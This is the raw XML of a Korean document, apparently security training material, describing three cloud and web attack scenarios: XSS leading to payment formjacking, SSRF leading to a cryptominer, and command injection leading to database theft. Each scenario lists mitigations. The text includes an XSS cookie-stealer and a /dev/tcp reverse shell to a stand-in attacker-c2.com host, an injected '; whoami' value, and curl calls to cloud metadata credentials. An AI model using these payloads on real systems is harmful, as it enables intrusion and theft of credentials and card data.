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ovlb8sl7fz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WEB 결제망 침해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color w:val="d4d4d4"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
          <w:shd w:fill="191919" w:val="clear"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_d2tpu6bb6ti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웹 취약점 체인 공격을 통한 내부망 침투 및 지속성 기반 결제망 침해 시나리오</w:t>
      </w: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6491te6yy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개요(Overview)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공격자는 외부 서비스 중인 웹 애플리케이션의 '1:1 문의게시판'에서 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Stored XSS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취약점을 악용하여 관리자 세션을 탈취하고, 관리자 전용 '파일 업로드' 기능의 취약점을 통해 웹 서버(WAS)의 제어권(RCE)을 획득한다.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명령어 실행 권한을 얻은 공격자는 외부 C2 서버로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리버스 쉘(Reverse Shell)을 연결하여 내부망에 1차 침투하고, 안정적인 시스템 제어 및 명령어 입출력을 위해 TTY(대화형 쉘)를 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내부 env에 aws key등 자격증명 노출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확인하여 이를 통해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s3에 노출된 관리자의 Pem Key를 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터널링(Tunneling)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구축하여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침투한 도커 컨테이너를 오설정된 소켓 취약점을 통해 탈출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탈출한 Host의 IP를 확인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 이에 대한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터널링을 통한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네트워크 정보를 수집 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이전 s3에서 탈취한 Key로  다른 내부 호스트로의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횡적 이동(Lateral Movement)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수행한다.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동시에, 초기 침투 경로가 발각되어 차단되더라도 서버에 언제든 다시 접속할 수 있도록 모든 서비스를 관리하는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Bastion Host에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BPFDoor(은닉형 백도어)를 설치하여 방화벽을 우회하는 지속적인 접근 권한(Persistence)을 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최종적으로 공격자는 장악한 권한을 이용해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애플리케이션의 프론트엔드 소스코드를 변조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결제 페이지를 위장한 피싱 페이지로 사용자에게 보여준다. 해당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피싱 페이지는 각 사용자의 첫 결제 시에만 보여지며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이를 통해 정상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사용자의 신용카드 및 결제 정보를 공격자의 서버로 실시간으로 전송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함으로써, 공격자는 탈취한 결제 정보를 이용한 무단 결제 및 재판매 등의 범죄 행위를 통해 금전적 이득을 취할 수 있다.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3hsw5q2ey1q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4"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2. 단계별 공격 절차(Kill Chain)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1: 초기 침투 및 관리자 세션 탈취 (Initial Access &amp; Credential Access)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Stored XSS 페이로드 주입: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공격자는 웹 서비스의 '1:1 문의게시판' 등 외부 사용자가 입력 가능한 폼(Form)에 악의적인 자바스크립트를 은닉하여 게시글을 등록한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000001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Payload 예시:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> &lt;script&gt;new Image().src="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http://attacker-c2.com/steal?cookie=</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"+document.cookie;&lt;/script&gt;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세션 하이재킹(Session Hijacking):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고객센터 관리자가 문의글을 확인하기 위해 해당 게시글을 열람하는 순간 스크립트가 실행되고, 관리자의 유효한 세션 쿠키가 공격자의 C2 서버로 전송된다.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관리자 권한 획득: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공격자는 탈취한 세션 쿠키를 자신의 브라우저에 주입하여 인증을 우회하고 정상적인 관리자 전용 페이지 접근 권한을 획득한다.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2: 시스템 제어권 획득 및 대화형 쉘 확보 (Execution &amp; Command and Control)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파일 업로드 취약점 악용 (Web Shell):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관리자 페이지 내 '공지사항 첨부파일' 기능을 악용하여 확장자 검증 로직을 우회하고, WAS(웹 서버) 도커 컨테이너 내부에 악성 웹쉘을 업로드 및 실행한다.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리버스 쉘(Reverse Shell) 연결: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업로드된 웹쉘을 통해 WAS 구동 계정 권한으로 OS 명령어를 실행하며, C2 서버로 역방향 쉘 커넥션을 생성하여 초기 내부망 거점을 확보한다.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실행 예시:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> bash -i &gt;&amp; /dev/tcp/attacker-c2.com/4444 0&gt;&amp;1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TTY(대화형 쉘) 확보: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리버스 쉘 접속 후, 상호작용이 필요한 명령어 사용을 위해 Python PTY 모듈 등을 사용하여 완전한 TTY(Interactive Shell) 환경을 구축한다.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3: 클라우드 자격증명 탈취, 컨테이너 탈출 및 횡적 이동 (Privilege Escalation &amp; Lateral Movement)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환경변수(env) 내 자격증명 탈취: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쉘을 획득한 컨테이너 내부에서 env 명령어를 통해 환경변수를 확인하던 중, 하드코딩되어 노출된 AWS Access Key와 Secret Key를 발견한다.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S3 버킷 접근 및 PEM Key 확보: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탈취한 AWS 자격증명을 AWS CLI 등에 등록하여 내부 S3 버킷에 접근하고, 백업용이나 공유용으로 잘못 업로드되어 있던 '관리자용 SSH PEM Key'를 다운로드하여 확보한다.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도커 소켓 취약점 악용 컨테이너 탈출 (Container Escape):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컨테이너 내부에 오설정으로 마운트된 도커 소켓(/var/run/docker.sock)을 발견하고, 이를 이용해 Host OS의 루트 디렉토리를 마운트하는 특권(Privileged) 컨테이너를 새로 실행하여 Host OS로 탈출(Escape)한다.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터널링(Tunneling) 및 네트워크 정찰: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탈출한 Host OS의 네트워크 인터페이스(IP)를 확인한 후, C2 서버와 통신하는 프록시 도구(Chisel 등)를 실행하여 SOCKS5 터널링을 구축한다. 이를 통해 내부망 토폴로지 및 포트 스캔을 수행한다.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횡적 이동 (Lateral Movement):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수집된 내부망 네트워크 정보와 앞서 S3에서 탈취한 관리자 PEM Key를 결합하여, 내부망 내 다른 주요 호스트 및 인프라 서버로 SSH 접속을 시도하며 횡적 이동을 수행한다.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4: 방어 회피 및 지속성 유지 (Defense Evasion &amp; Persistence)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Bastion Host 장악 및 BPFDoor 설치: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공격자는 횡적 이동을 통해 내부망의 모든 서비스를 접근·관리할 수 있는 핵심 길목인 배스천 호스트(Bastion Host)에 도달한다. 초기 침투 경로가 차단될 것에 대비하여 배스천 호스트에 리눅스 커널 eBPF 기술을 악용한 스텔스 백도어(BPFDoor)를 설치한다.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지속적 접근 권한(Persistence) 확보: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BPFDoor는 방화벽(iptables) 규칙을 우회하며, 공격자가 보내는 특정 '매직 패킷(Magic Packet)'에만 반응하여 포트를 열어준다. 이를 통해 관리자가 비밀번호나 접근 제어를 변경하더라도 언제든 배스천 호스트를 통해 전체 내부망에 재침투할 수 있는 영구적인 백도어 채널을 유지한다.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5: 최종 임팩트 - 조건부 피싱 및 결제 정보 유출 (Impact - Targeted Formjacking)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소스코드 변조 및 피싱 페이지 은닉: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장악한 권한을 통해 애플리케이션 프론트엔드 소스코드(또는 빌드 파이프라인)를 변조한다. 공격자는 정상 결제 페이지를 가로채고 자신이 제작한 '위장된 피싱 결제 페이지'를 렌더링하도록 조작한다.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탐지 우회 로직 (First-Time Only):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공격 지속 시간을 늘리고 사용자의 의심을 피하기 위해, 쿠키나 로컬 스토리지(Local Storage)를 검사하여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사용자의 '첫 결제 시도' 시에만 피싱 페이지가 노출되도록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악성 스크립트를 정교하게 구성한다.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결제 정보 실시간 유출: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피싱 페이지에서 신용카드 번호, 유효기간, CVC, 비밀번호 등을 입력하고 버튼을 누르면, 해당 정보는 C2 서버로 실시간 전송(AJAX/Fetch)된다. 사용자는 정상 결제가 이루어진 것을 보고 전혀 의심하지 않지만, 공격자는 탈취한 금융 정보를 통해 무단 결제 및 다크웹 재판매 등 막대한 금전적 이득을 취한다.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niamc4lz082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4"/>
          <w:szCs w:val="34"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3. 보안 조치(Mitigation)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 &amp; 2 (초기 차단 및 컨테이너 보안):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XSS 방어를 위한 입력/출력 데이터 살균(Sanitization) 및 관리자 세션 쿠키에 HttpOnly 속성 적용 의무화.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업로드 디렉토리 내 스크립트 실행 권한 차단.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컨테이너 내 불필요한 OS 명령어(Shell, cURL, Python 등) 제거 및 읽기 전용(Read-Only) 파일 시스템 적용.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 (클라우드 자격증명 관리 및 탈출 방지):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자격증명 보호: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AWS Key를 애플리케이션 환경변수(env)나 코드에 하드코딩하지 않고, **IAM Role(EC2/EKS Task Role)**이나 AWS Secrets Manager를 통해 권한을 부여.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S3 접근 제어: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S3 버킷을 퍼블릭(Public)으로 노출하지 않고 최소 권한 원칙(Least Privilege)을 적용하며, 중요 인증키(PEM)는 S3가 아닌 전용 키 관리 시스템(KMS, Vault 등)에 보관.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도커 보안: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애플리케이션 컨테이너에 도커 소켓(/var/run/docker.sock) 마운트를 엄격히 금지하고, 가능하면 Rootless Docker를 사용하여 권한 상승을 원천 차단.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 (배스천 호스트 보호 및 백도어 탐지):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Bastion Host 보안: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배스천 호스트 접속 시 MFA(다중 인증)를 필수로 적용하고, 특정 인가된 IP에서만 접근 가능하도록 Security Group을 제한.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스텔스 백도어 탐지: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BPFDoor와 같은 커널 레벨 악성코드를 탐지하기 위해 eBPF 시스템 콜(Syscall)을 모니터링할 수 있는 고도화된 EDR(Endpoint Detection and Response) 솔루션 도입.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5 (무결성 및 유출 방지):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 모니터링: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프론트엔드 정적 파일(JS, HTML)에 대한 무결성 검증(FIM) 및 빌드 파이프라인 접근 제어 강화.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유출 방지(CSP):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승인되지 않은 외부 도메인(공격자 C2 등)으로의 데이터 전송을 원천적으로 막는 강력한 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">CSP(Content Security Policy)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헤더 적용 및 위반 사항 리포팅 활성화.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공격 흐름도(Diagram)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154163</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="5324433"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT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244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레퍼런스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https://programmer-may.tistory.com/250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https://www.boannews.com/media/view.asp?idx=129100&amp;page=3&amp;kind=1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https://www.boannews.com/media/view.asp?idx=133743&amp;page=2&amp;kind=1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1kk4pp6nrc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WEB 랜섬웨어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v741wi8k8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SSRF 취약점을 통한 인프라 장악 및 클라우드 자원 탈취 공격 시나리오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ekg6giiw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개요(Overview)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공격자는 북촌 웹 애플리케이션의 '도서 미리보기' 기능에서 발생하는 SSRF 취약점을 이용하여 내부 클라우드 메타데이터 서비스(IMDS)에 접근한다. 공격자는 이를 통해 획득한 IAM 자격 증명을 사용하여 클라우드 환경 내 관리자 권한을 확보하고, 인프라의 핵심 자산인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Bastion Host(점프 서버)의 접속 정보(SSH Key)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탈취한다.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이후 공격자는 탈취한 SSH Key를 사용하여 Bastion Host에 접속하고, 이를 교두보로 삼아 외부에서 직접 접근이 불가능한 사설망(Private Subnet) 내부로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네트워크 터널링(SSH Dynamic Port Forwarding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구축한다. 공격자는 내부망 호스트들을 정찰하여 취약한 서버들을 식별하고, 각 서버에 가상화폐 채굴기(XMRig)를 배포 및 실행하여 클라우드 자원을 무단 점유한다. 최종적으로 공격자는 해당 인프라의 컴퓨팅 자원을 이용해 가상화폐를 채굴함으로써 서비스 가용성을 저하시킴과 동시에 금전적 이득을 취할 수 있다.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5fv0vjvew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단계별 공격 절차(Kill Chain)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7rezaemu1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1: 초기 침투 및 클라우드 메타데이터 탈취 (Initial Access &amp; Credential Access)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SSRF 취약점 식별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도서 미리보기 기능의 url 파라미터가 외부 리소스를 검증 없이 호출하는 SSRF 취약점 발견.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메타데이터 탈취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http://169.254.169.254/latest/meta-data/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 접근하여 인스턴스 프로파일에 할당된 IAM Role의 임시 자격 증명(Access Key, Secret Key, Token) 탈취.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권한 확인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탈취한 자격 증명을 이용해 aws sts get-caller-identity를 실행하여 해당 EC2가 인프라 관리자급 권한(AdministratorAccess 등)을 보유함을 확인.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tqp9kktzp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2: Bastion Host 접근 정보 확보 (Discovery &amp; Credential Access)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인프라 정찰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aws s3 ls로 설정 파일이 담긴 버킷을 탐색하거나, aws ssm get-parameters를 통해 관리자가 저장해 둔 Bastion Host의 SSH Private Key를 탈취.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접속 정보 획득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Bastion Host의 IP 주소 및 해당 서버에 접속 가능한 SSH Key를 확보하여 내부망 침투 준비 완료.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8k8zlfaxo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3: 내부망 정찰 및 터널링 구축 (Lateral Movement &amp; Tunneling)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Bastion Host 침투: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공격자는 탈취한 SSH Key를 사용하여 Bastion Host에 접근.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 터널링 구축: 공격자는 자신의 로컬 PC에서 Bastion Host를 경유지로 설정하는 SSH Dynamic Port Forwarding (-D 1080) 명령을 실행. 이를 통해 공격자의 로컬 도구(Nmap, Burp Suite 등)가 내부 사설망(Private Subnet)의 모든 호스트와 통신 가능한 상태가 됨.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내부 정찰: 터널링된 네트워크를 통해 사설망 내부의 데이터베이스 서버, 웹 서버 등 활성 호스트와 열린 포트를 스캔하여 취약한 대상 식별.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ik8sbbs1w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4: 방어 회피 및 지속성 유지 (Defense Evasion &amp; Persistence)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횡적 이동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내부망 호스트들의 SSH 서비스 혹은 공통 관리자 계정 정보를 이용하여 각 인스턴스로 개별 접속.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채굴기 배포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각 인스턴스에 가상화폐 채굴기(XMRig)를 다운로드하고 실행. 이때 시스템 프로세스로 위장(Process Masquerading)하여 탐지를 회피.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 삭제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SSH 접속 기록(~/.bash_history, /var/log/auth.log)을 삭제하고, 방화벽 로그를 우회하여 지속적으로 채굴 풀과 통신.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rn02pzfth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5: 최종 임팩트 - 인프라 장악 및 데이터 유출 (Impact)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유출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내부망의 RDS 데이터베이스에 접근하여 전체 데이터를 덤프하고 외부로 전송.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금전적 피해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모든 클라우드 인스턴스 자원을 공격자의 채굴 풀에 연결하여 금전적 이득 및 막대한 클라우드 비용과 자원 성능 저하 유도.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rrsbufdxmk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보안 조치(Mitigation)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 (초기 차단):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 입력값 화이트리스트 검증 및 IMDSv2 필수 적용(Token 기반 인증).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(권한 통제):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IAM Role의 최소 권한 원칙 준수. 특히 SSH Key와 같은 민감한 자산은 AWS Secrets Manager에 저장하고 고도화된 권한 제어(IAM Policy) 적용.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 (내부 통제):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Bastion Host의 접속 IP를 특정 VPN 대역으로 제한. SSH 접속 시 반드시 다중 인증(MFA) 강제.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 (탐지 체계):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내부망 내에서의 비정상적인 SSH 트래픽, 과도한 포트 스캔, 채굴 풀 도메인 통신을 탐지하기 위한 VPC Flow Logs 모니터링 및 EDR 도입.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5 (무결성 및 로그 보호):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CloudTrail 로그를 별도 계정의 S3 버킷에 보관하여 삭제 방지, 내부 자산에 대한 주기적인 보안 컴플라이언스 점검 수행.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a3myezmcu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공격 흐름도(Diagram)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007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200025</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5734050" cy="5205991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059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레퍼런스</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000007F">
      <w:pPr>
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20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https://www.igloo.co.kr/security-information/ssrf-%EC%B7%A8%EC%95%BD%EC%A0%90%EC%9D%84-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EA%B3%B5%EA%B2%A9%EC%82%AC%EB%A1%80-%EB%B6%84%EC%84%9D-%EB%B0%8F-%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%88/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b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId14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https://www.boannews.com/media/view.asp?idx=122109&amp;page=4&amp;kind=1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x23b02iqw0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APP 채굴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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_qlv220udg49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OS Command Injection과 WebView Bridge 취약점을 통한 클라우드 권한 탈취 및 데이터베이스 침해 시나리오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jm6qcp5jl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개요(Overview)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 진단(Ping) 기능에서 발생하는 OS Command Injection 취약점을 통해 공격자가 웹 서버(WAS)의 명령어 실행 권한(Remote Code Execution, RCE)을 획득한다.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이후 서버 내부 환경 변수 및 애플리케이션 설정 파일(.env, config 파일 등)을 분석하여 JWT Secret 및 데이터베이스(DB) 접속 정보를 탈취하고, 이를 기반으로 관리자 권한을 획득한다.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공격자는 추가적으로 Android WebView의 JavascriptInterface 설계 취약점을 악용하여 관리자 앱의 인증 정보를 탈취함으로써 웹 권한을 넘어 앱 권한까지 확장한다.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또한, 서버가 클라우드 환경(AWS EC2)에서 동작하며 IAM Role이 부여되어 있고 IMDSv1이 허용된 환경을 이용하여, 메타데이터 서비스로부터 임시 자격 증명을 탈취한다.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최종적으로 공격자는 탈취한 DB 계정 정보와 클라우드 권한을 결합하여 RDS 데이터베이스에 접근하고, 민감 정보를 유출하거나 데이터를 변조하는 공격을 수행한다.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000008B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0k2t68cp9a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단계별 공격 절차(Kill Chain)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xljgr4y7d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1: 초기 침투 및 서버 장악 (Initial Access &amp; Execution)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OS Command Injection 취약점 식별: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/api/diagnostics/ping 엔드포인트에서 host 파라미터가 검증 없이 OS 명령어(ping)의 인자로 전달되는 취약점 발견.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공격 수행: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POST 요청의 JSON 바디에 명령어 구분자(; 또는 &amp;)를 삽입하여 임의 명령 실행.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 예시: {"host": "127.0.0.1 ; whoami"}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서버로부터 ubuntu 계정 권한 응답 확인 및 원격 코드 실행(RCE) 성공.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ioep68k4uy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2: 내부 정보 수집 및 관리자 권한 획득 (Discovery &amp; Credential Access)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환경 정보 수집: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쉘 획득 후 env 명령어를 통해 시스템 환경 변수에 노출된 내부 자격 증명 탐색.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명령어 예시</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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cat .env</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000009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cat config/application.yml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민감 정보 탈취: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시스템 및 애플리케이션 정보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데이터베이스 권한 획득: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접속 정보 (DB_HOST, DB_USER, DB_PASSWORD)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AWS 인프라 관리 권한 획득: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">IAM Credentials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9jbekjx0d3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3: WebView Bridge 악용을 통한 권한 확장 (Privilege Escalation)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취약점 식별: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 앱의 WebView에서 JavascriptInterface가 외부 origin 검증 없이 노출됨.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공격 수행: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장악한 WAS를 이용하여 관리자 공지사항 HTML에 악성 스크립트 삽입.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 App.getAuthToken();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관리자 앱 실행 시 JS Interface 호출, 앱 내부 저장 토큰 탈취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/>
      </w:pPr>
      <w:bookmarkStart w:colFirst="0" w:colLast="0" w:name="_cipyuzz0vq3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4: 클라우드 메타데이터 접근 및 IAM 탈취 (Discovery &amp; Credential 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메타데이터 접근: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내부 권한을 이용해 AWS 인스턴스 메타데이터 서비스(IMDS) 호출.</w:t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 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/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IAM Role 정보 획득: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security-credentials 경로를 호출하여 해당 EC2에 부여된 IAM Role의 AccessKey, SecretKey, Session Token 탈취.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 curl http://169.254.169.254/latest/meta-data/iam/security-credentials/[RoleName]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vnsvh6tz9h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보안 조치(Mitigation)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 (초기 차단):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 명령어 실행 시 사용자 입력값 직접 결합 금지. Java의 경우 ProcessBuilder 사용 시 인자를 리스트 형태로 분리하여 전달하거나, isReachable()과 같은 안전한 기본 API 사용.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(권한 통제):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Secret 등 민감 정보는 환경 변수 노출 금지, AWS Secrets Manager와 같은 전문 관리 도구 도입.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 (앱 보안 강화):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WebView 내 JavascriptInterface 사용 시 도메인 화이트리스트 검증 로직 추가. setAllowFileAccess(false) 등 보안 설정 강화.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 (클라우드 보안):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EC2 인스턴스에 토큰 기반의 IMDSv2 강제 적용. IAM Role 부여 시 최소 권한 원칙(Least Privilege) 준수.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5 (탐지 및 대응):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CloudTrail 및 GuardDuty를 통한 비정상적인 자격 증명 사용 탐지. DB 접근 로그 모니터링 및 침입 탐지 시스템(IDS) 구축.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ijaeujd9g5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공격 흐름도(Diagram)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="000000A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5448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https://www.wins21.com/kor/promotion/information.html?bmain=view&amp;uid=892&amp;search=%26depth1%3D%26find_field%3Dtitle%26find_word%3DCVE%26page%3D66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169.254.169.254/latest/meta-data/%EC%97%90" TargetMode="External"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.boannews.com/media/view.asp?idx=133743&amp;page=2&amp;kind=1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.igloo.co.kr/security-information/ssrf-%EC%B7%A8%EC%95%BD%EC%A0%90%EC%9D%84-%EC%9D%B4%EC%9A%A9%ED%95%9C-%EA%B3%B5%EA%B2%A9%EC%82%AC%EB%A1%80-%EB%B6%84%EC%84%9D-%EB%B0%8F-%EB%8C%80%EC%9D%91%EB%B0%A9%EC%95%88/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oannews.com/media/view.asp?idx=129100&amp;page=3&amp;kind=1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s://www.boannews.com/media/view.asp?idx=122109&amp;page=4&amp;kind=1" TargetMode="External"/><Relationship Id="rId16" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.wins21.com/kor/promotion/information.html?bmain=view&amp;uid=892&amp;search=%26depth1%3D%26find_field%3Dtitle%26find_word%3DCVE%26page%3D66" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/styles" Target="styles.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://attacker-c2.com/steal?cookie=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programmer-may.tistory.com/2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